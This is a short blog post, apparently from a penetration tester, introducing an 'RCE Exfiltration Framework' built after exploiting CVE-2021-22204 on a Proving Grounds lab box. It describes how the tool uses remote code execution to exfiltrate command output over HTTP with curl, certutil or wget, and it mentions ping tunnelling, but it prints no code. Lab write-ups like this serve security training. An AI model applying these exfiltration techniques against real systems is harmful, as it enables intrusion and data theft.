RCE Exfiltration Framework?

So I got tired of running into boxes finding RCE vulnerabilities, but not being able to establish a shell. But wait.. we do have RCE right?

It started with this proving grounds box called Exghost which was found to be vulnerable to CVE-2021-22204 allowing us to achieve RCE by crafting a JPEG with malicious metadata and sending it to a webserver.

Of course after this you would want to get a reverse shell right?

After trying a few reverse shell payloads, I thought to myself, why go through all this trouble to find a shell when I already had RCE?

Exfiltration Using RCE Exfiltration Framework

The code is available on github: https://github.com/yerodin/RCE-Exfiltration-Framwework

The Basic Idea

Hmm.. so first we need to create a python module with a function called my_rce_function(cmd) to trigger the RCE.

Below I created a module called exghost_rce to trigger the RCE and run a specific command.

Next, I triggered the script telling it exfiltrate the data using curl, passing the module name as an argument.

Voila!! we were able to simulate a shell!

After doing some exfiltration with the framework, I was able to determine that the system had python3, this allowed me to easily figure out what payload I needed to send to catch a shell and gain a stronger foothold into the target.. way faster than throwing a bunch of commands and hoping for the best.

Of course right now we are basically only doing reverse http with a few commands like curl, certutil and wget, but there are many creative ways to exfiltrate data, even through ping! Check out ptunnel.

I can't tell the amount of times a ran into a box where I spent hours trying to get a shell, so I do see this being a useful tool.

Currently its just a POC but I plan to continue working on this in my spare time, feel free to send a pull request!

Let me know what you guys think! All suggestions are welcome :)